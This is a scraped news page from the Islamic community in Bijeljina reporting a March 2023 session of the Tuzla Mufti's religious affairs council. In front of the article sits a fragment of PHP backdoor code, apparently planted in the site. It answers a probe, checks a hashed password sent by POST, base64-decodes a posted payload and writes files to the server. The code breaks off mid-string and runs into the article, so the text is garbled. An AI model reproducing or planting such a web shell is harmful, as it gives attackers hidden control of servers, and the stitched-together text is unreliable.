function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Održana redovna sjednica Savjeta za vjerska pitanja Muftijstva tuzlanskog - Medžlis Islamske zajednice Bijeljina

Održana redovna sjednica Savjeta za vjerska pitanja Muftijstva tuzlanskog

Održana redovna sjednica Savjeta za vjerska pitanja Muftijstva tuzlanskog

U ponedjeljak, 13. marta 2023. godine, održana je redovna sjednica Savjeta za vjerska pitanja Muftijstva tuzlanskog. Sjednicom je predsjedavao muftija tuzlanski dr. Vahid-ef. Fazlović.

Na sjednici je razmatran plan ramazanskih aktivnosti na području Muftiluka tuzlanskog. Istaknuta je važnost temeljitih priprema za obavljanje ramazanskih ibadeta te brojnih poslova i aktivnosti u svim našim džematima.

Razmatran je plan realizacije akcije „Otvorimo hiljade vrata – brigom o porodici ojačajmo džemat“. U okviru ove tradicionalne akcije na razini džemata, medžlisa i ustanova Islamske zajednice na području Muftiluka tuzlanskog, realizirat će se veliki broj posjeta porodicama.

Članovi Savjeta za vjerska pitanja Muftijstva tuzlanskog razmatrali su informaciju o organiziranju općinskih takmičenja iz islamske vjeronauke. Na ovim takmičenjima učestvovao je 551 takmičar iz 120 osnovnih škola i 109 takmičara iz 47 srednjih škola. Regionalno takmičenje će biti održano 18. marta 2023. godine u Behram-begovoj medresi u Tuzli.

Razmatrana je i informacija o realizaciji akcije „Vršnjak vršnjaku daruje 1 KM“ tokom 2022. godine. Akcija je uspješno realizovana dva puta tokom prošle godine, u mektebima i na časovima islamske vjeronauke. Značajniji dio sredstava, prema ranije utvrđenom planu, bit će uložen u nabavku „Senzorne sobe“ za potrebe rada JU Centar za autizam „Meho Sadiković“ u Tuzli.

Na sjednici je usvojen kalendar vjerskih i kulturnih manifestacija na području Muftiluka tuzlanskog u 2023. godini.

Savjet je razmatrao i druga pitanja iz domena svoga rada.

U drugom dijelu sjednice, prisutnima se obratio direktor Uprave za vjerske poslove Rijaseta Islamske zajednice u Bosni i Hercegovini hafiz dr. Mensur-ef. Malkić. Direktor Malkić je ovom prilikom kazao da je posao imama misija koja se obavlja u ime Allaha, dželle šanuhu, i uz Njegovu pomoć i zadovoljstvo. U svome obraćanju je govorio o specifičnostima imamskog rada, ramazanskim aktivnostima, te brizi o porodici i džematu.

 

Preuzeto sa: Muftijstvo tuzlansko